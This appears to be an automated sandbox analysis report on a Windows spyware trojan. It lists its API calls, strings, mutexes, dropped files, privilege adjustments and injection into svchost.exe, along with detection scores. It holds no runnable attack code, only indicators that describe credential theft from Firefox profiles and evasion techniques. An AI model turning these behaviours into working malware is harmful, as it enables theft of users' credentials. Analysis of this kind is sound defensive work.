                Source: OVZizpEU7Q.exe, 00000000.00000000.2283868731.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b3a31f46-9
                Source: OVZizpEU7Q.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a78d0ca2-1
                Source: OVZizpEU7Q.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_43beca66-a
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CBC3 NtClose,2_2_0042CBC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0040E6A00_2_0040E6A0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0042D9750_2_0042D975
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0040FCE00_2_0040FCE0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004221C50_2_004221C5
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004362D20_2_004362D2
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004803DA0_2_004803DA
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0043242E0_2_0043242E
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004225FA0_2_004225FA
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0045E6160_2_0045E616
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004166E10_2_004166E1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0043878F0_2_0043878F
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004368440_2_00436844
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004808570_2_00480857
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004188080_2_00418808
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004688890_2_00468889
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0042CB210_2_0042CB21
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00436DB60_2_00436DB6
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00416F9E0_2_00416F9E
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004130300_2_00413030
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0042F1D90_2_0042F1D9
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004231870_2_00423187
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004012870_2_00401287
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004214840_2_00421484
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004155200_2_00415520
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004276960_2_00427696
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004157600_2_00415760
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004219780_2_00421978
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00439AB50_2_00439AB5
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00525CC80_2_00525CC8
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00487DDB0_2_00487DDB
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00421D900_2_00421D90
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0042BDA60_2_0042BDA6
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0040DF000_2_0040DF00
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00413FE00_2_00413FE0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00B000D90_2_00B000D9
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC6EAF0_2_00AC6EAF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC51EE0_2_00AC51EE
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AFD5800_2_00AFD580
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AF37800_2_00AF3780
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AFC7F00_2_00AFC7F0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00B039A30_2_00B039A3
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AF59800_2_00AF5980
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC7B710_2_00AC7B71
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC7F800_2_00AC7F80
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00D708A00_2_00D708A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418BA32_2_00418BA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E8552_2_0040E855
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C82_2_004010C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010D02_2_004010D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F1D32_2_0042F1D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029F82_2_004029F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A002_2_00402A00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032D02_2_004032D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041040A2_2_0041040A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104132_2_00410413
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015002_2_00401500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416DA32_2_00416DA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E6432_2_0040E643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004106332_2_00410633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026F02_2_004026F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E7882_2_0040E788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E7932_2_0040E793
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC02C02_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C301002_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA1182_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD20002_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C02_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C647502_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C407702_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C6E02_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D005912_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C405352_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEE4F62_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF24462_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE44202_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF6BD72_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB402_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA802_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A02_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0A9A62_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C569622_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E8F02_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C268B82_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4A8402_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C428402_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC82_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4CFE02_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBEFA02_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4F402_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C82F282_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60F302_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE2F302_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEEDB2_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52E902_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFCE932_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40E592_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEE262_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3ADE02_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C58DBF2_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4AD002_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDCD1F2_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30CF22_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0CB52_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40C002_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE1AA32_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD59102_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 278 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: String function: 00407DE1 appears 35 times
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: String function: 00428900 appears 41 times
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: String function: 00420AE3 appears 70 times
                Source: OVZizpEU7Q.exe, 00000000.00000003.2295608545.0000000004CED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exe, 00000000.00000003.2295274296.0000000004313000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exe, 00000000.00000003.2286521331.0000000003EC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exe, 00000000.00000003.2297462182.0000000004200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs OVZizpEU7Q.exe
                Source: OVZizpEU7Q.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: OVZizpEU7Q.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: OVZizpEU7Q.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@8/6@18/14
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00AECBD0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile created: C:\Users\user\AppData\Roaming\dfc48433435cc549.binJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-dfc48433435cc549-inf
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-dfc48433435cc54973779169-b
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile created: C:\Users\user\AppData\Local\Temp\autDAA9.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: choice.exe, 00000007.00000003.2866854699.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2866675348.000000000329F000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2864440863.0000000003295000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2866854699.0000000003295000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2864340358.0000000003274000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4757471775.0000000003295000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4757471775.00000000032C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OVZizpEU7Q.exeVirustotal: Detection: 73%
                Source: OVZizpEU7Q.exeReversingLabs: Detection: 86%
                Source: unknownProcess created: C:\Users\user\Desktop\OVZizpEU7Q.exe "C:\Users\user\Desktop\OVZizpEU7Q.exe"
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OVZizpEU7Q.exe"
